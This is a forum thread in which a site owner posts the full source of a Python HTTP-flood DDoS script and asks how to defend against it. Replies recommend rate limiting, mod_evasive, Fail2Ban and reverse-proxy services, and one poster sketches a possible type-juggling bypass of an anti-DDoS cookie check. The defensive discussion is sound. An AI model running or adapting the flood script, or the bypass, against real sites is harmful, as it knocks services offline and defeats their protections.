A script that can down most known websites

[pwn3r]

I have been receiving a lot of attacks lately on my webserver and finally got referred to the script that this guys is using
I would like to know how can I protect my website against this type of script:

#/usr/bin/python

# function : ddos tools
# author   : firefoxbug

import os
import re
import sys
import time
import signal
import socket
import getopt
import random
import urllib
import threading

def usage():
    # print ''' usage : python attack.py [-t] [-c] http://www.zhihu.com/
    # -h : help
    # -t : lasting time of ddos
    # -c : numbers of thread to create'''

    sys.exit()

# generates a user agent array
def useragent_list():
    global headers_useragents
    headers_useragents = []
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers = []
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    return(headers_referers)

def handler(signum,_):
    # if signum == signal.SIGALRM:
        # print 'Time is up'
        # print 'Attack finished '
    sys.exit()

#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def send_packet(host,param_joiner):
    request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    # try:
    #     response = urllib2.urlopen(request)
    # except urllib2.HTTPError, error:
    #     pass
    # except urllib2.URLError, error:
    #     pass
#    print "response code = %d "%response.code

def attack(host,param_joiner):
    while True:
        send_packet(host,param_joiner)

def parse_parameters(parameters):

    global url
    global interval
    global num_thread
    interval_def = 30
    num_thread_def = 5
    interval = interval_def
    num_thread = num_thread_def   
    try :
        opts,args = getopt.getopt(parameters,"ht:c:",["help"])
        url = args[0]
        for opt,arg in opts:
            if opt in ('-h','--help'):
                usage()
            elif opt in ('-t','--time'):
                if arg.isalnum():
                    interval = arg
                else:
                    usage()
            elif opt in ('-c','--count'):
                if arg.isalnum():
                    num_thread = arg
                else:
                    usage()
    except getopt.GetoptError: 
        print("getopt error!"); 
        usage(); 
        sys.exit(1);

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
        sys.exit()
    parse_parameters(sys.argv[1:])
    print ("Debug : thread=%d time=%d %s"%(int(num_thread),int(interval),url))
    if url.count('/') == 2:
        url = url + "/"
    m = re.search('http\://([^/]*)/?.*', url)
    try :
        host = m.group(1)
    except AttributeError as e:
        usage()
        sys.exit()

    useragent_list()
    referer_list()

    if url.count("?") > 0:
        param_joiner = "&"
    else:
        param_joiner = "?"
    
    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(int(interval))

    for i in range(int(num_thread)):
        newpid = os.fork()
        if newpid == 0:
#            signal.signal(signal.SIGINT, signal.SIG_DFL)
            attack(host,param_joiner)
        else:
            pass
#            print ("Child process",os.getpid(),newpid)
    time.sleep(int(interval))
    signal.alarm(0)
    print ("main thread exit...")


#     ddos
# ====

# DDOS tool in python.

# =============== usage =============

# python attack.py [option] http://www.firefoxbug.net/

#     -h : help

#     -t : lasting time of ddos

#     -c : numbers of thread to create

Source

I think Cloudflare could help but I do not want to keep attack mode enabled on my website

 

[Asphyxia]

PLEASE ANSWER ME: What type of site are you running? WordPress, XenForo, or some other stuff.. I need to know for resource usage. Secondly, what server software - Apache, NGINX, etc

I think Cloudflare could help but I do not want to keep attack mode enabled on my website

Two main options: https://doc.bitninja.io/modules/dosdetection.html this is freaking cool.

Otherwise, on Apache use Mod_Security, Mod_Evasive, and maybe Fail2Ban

Nginx options include https://www.nginx.com/blog/rate-limiting-nginx/ or https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

Hopefully the above options work, if not let me know and I will do additional testing. You could also attack this with another type of firewall like perhaps iptables but stopping this with a service like Cloudflare, Sucuri, or something else would be most ideal.

Some other neat shit to look into:

GitHub - CleanTalk/anti-ddos-lite: Anti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.

Anti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack. - CleanTalk/anti-ddos-lite

github.com

GitHub - C0nw0nk/Nginx-Lua-Anti-DDoS: A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect yourself from ev

A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect y...

github.com

GitHub - fnzv/net-Shield: An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices - Beta

An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices - Beta - fnzv/net-Shield

github.com

If your website is STATIC content, you could see about using something more efficient like https://zeit.co/

CLOUDKITE IS FKN COOL TOO MAN: https://github.com/coinkite/cloudfire

--- the rest is other stuff ---

I am going to investigate this behavior of attacking although based on how this works I believe we could use some sort of JavaScript on first load to allow the user in, otherwise block their loads - but perhaps rate limit them regardless. Do not let a single IP address use all your resources up quickly, so perhaps only allow X loads per minute.

What comes to mind is:

Blocking attacks with EasyApache 4's mod_evasive | cPanel

With the release of EasyApache 4 on Nov 7th, 2017, we now provide the mod_evasive Apache module. You can install it either in the EasyApache 4 interface, or with yum install ea-apache24-mod_evasive on the command line. What is mod_evasive? Themod_evasive Apache module helps to protect your...

blog.cpanel.com

Mod_Evasive is quite a typical solution, although one could work this with NGINX:

Mitigating DDoS Attacks with NGINX – NGINX Community Blog

www.nginx.com

Slowloris DoS Attack and Mitigation on NGINX Web Server

Slowloris DoS Attack gives a hacker the power to take down a web server in less than 5 minutes by just using a moderate personal laptop. The whole idea behind this attack technique is making use of…

hexadix.com

Configure WordPress wp-login + XMLRPC DDoS Protection nginx + fail2ban •

Configure WordPress wp-login + xmlrpc DDoS protection for nginx + fail2ban to automatically ban hacker bots from your web server

guides.wp-bullet.com

 

[Asphyxia]

P.S. blocking at your defense level is sometimes the best, because whatever your network lets in.. you can get fkt.

Think of Cloudflare (and other similar network services) as a giant dam holding back water - read here https://github.com/matrix-org/matrix.org/issues/342#issuecomment-468958655

If someone drops the amount of dam-held water that Cloudflare can hold fine onto your little log of a server, imagine what will happen. I hope that makes sense.

tl;dr log gets washed away. Block what attacks you can with configurations, but if things just get too serious you may need a stronger network backbone.

For me to really see what is going on with the attack, we all need a traffic capture posted here.. somehow, or email me.

[email protected] - off.. to shower, gotta do doctor stuff lel

 

[pwn3r]

For me to really see what is going on with the attack, we all need a traffic capture posted here.. somehow, or email me.

I searched my whole Log files and didn't seem to find those attacks - next time I'll try to save them before they get vanished.

Mod_Evasive is quite a typical solution, although one could work this with NGINX:

I'll try that first and then see the other alternatives you mentioned

Thanks @Asphyxia for your effort!
I will reply back to this post once I find a solution that works against this script

 

[Asphyxia]

I will reply back to this post once I find a solution that works against this script

I can also do some testing to see how to remediate the issue, my best advice is to launch this attack on a test server and record in any measurable ways including but not limited to application logging, packet capturing, and ANY possible methods to obtain a signature of this attack.

Because essentially what is wanted: we want to find an attack signature to look for, then use that to detect attacks, and block the source.

For example, we could even tie in the Cloudflare API so immediately once the attack begins - we blacklist their IP inside Cloudflare! I will explore this attack more, soon. Also I REALLY NEED TO KNOW WHAT TYPE OF SITE ARE YOU RUNNING - A FORUM OR WORDPRESS CMS OR WHAT..

 

[pwn3r]

Also I REALLY NEED TO KNOW WHAT TYPE OF SITE ARE YOU RUNNING - A FORUM OR WORDPRESS CMS OR WHAT..

When the attack was made, I had several sites on my vServer ( a vBulletin, a Flarum and some static pages ) they all went off once the attacker start his script.
Now, I still have the vBulletin forum, some static pages and running a PrestaShop website.

 

[Asphyxia]

Now, I still have the vBulletin forum, some static pages and running a PrestaShop website.

Can you try the free trial of BitNinja the next time he attacks you?

BitNinja Registration

bitninja.io

To see if this works.. they provide 7 days of protection free.

 

[FarisDev]

PLEASE ANSWER ME: What type of site are you running? WordPress, XenForo, or some other stuff.. I need to know for resource usage. Secondly, what server software - Apache, NGINX, etc



Two main options: https://doc.bitninja.io/modules/dosdetection.html this is freaking cool.

Otherwise, on Apache use Mod_Security, Mod_Evasive, and maybe Fail2Ban

Nginx options include https://www.nginx.com/blog/rate-limiting-nginx/ or https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

Hopefully the above options work, if not let me know and I will do additional testing. You could also attack this with another type of firewall like perhaps iptables but stopping this with a service like Cloudflare, Sucuri, or something else would be most ideal.

Some other neat shit to look into:

GitHub - CleanTalk/anti-ddos-lite: Anti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.

Anti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack. - CleanTalk/anti-ddos-lite

github.com

GitHub - C0nw0nk/Nginx-Lua-Anti-DDoS: A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect yourself from ev

A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect y...

github.com

GitHub - fnzv/net-Shield: An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices - Beta

An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices - Beta - fnzv/net-Shield

github.com

If your website is STATIC content, you could see about using something more efficient like https://zeit.co/

CLOUDKITE IS FKN COOL TOO MAN: https://github.com/coinkite/cloudfire

--- the rest is other stuff ---

I am going to investigate this behavior of attacking although based on how this works I believe we could use some sort of JavaScript on first load to allow the user in, otherwise block their loads - but perhaps rate limit them regardless. Do not let a single IP address use all your resources up quickly, so perhaps only allow X loads per minute.

What comes to mind is:

Blocking attacks with EasyApache 4's mod_evasive | cPanel

With the release of EasyApache 4 on Nov 7th, 2017, we now provide the mod_evasive Apache module. You can install it either in the EasyApache 4 interface, or with yum install ea-apache24-mod_evasive on the command line. What is mod_evasive? Themod_evasive Apache module helps to protect your...

blog.cpanel.com

Mod_Evasive is quite a typical solution, although one could work this with NGINX:

Mitigating DDoS Attacks with NGINX – NGINX Community Blog

www.nginx.com

Slowloris DoS Attack and Mitigation on NGINX Web Server

Slowloris DoS Attack gives a hacker the power to take down a web server in less than 5 minutes by just using a moderate personal laptop. The whole idea behind this attack technique is making use of…

hexadix.com

Configure WordPress wp-login + XMLRPC DDoS Protection nginx + fail2ban •

Configure WordPress wp-login + xmlrpc DDoS protection for nginx + fail2ban to automatically ban hacker bots from your web server

guides.wp-bullet.com

CleanTalk ddos protection might be vulnerable to type juggling I never tested it, but we can take a look at line 42

    if (isset($_COOKIE[$secure_cookie_label]) && $_COOKIE[$secure_cookie_label] == $secure_cookie_key) {

I think if we created the cookie, and added 0 as it's value or 1 or something else i never tried.
We will be able to bypass the protection
--
Correct me If I'm wrong. (Never tested) I just took a look.

 

[dosh]

I think I can get you a trial of blazingfast reverse proxy or the webhost trial, if you're interested let me know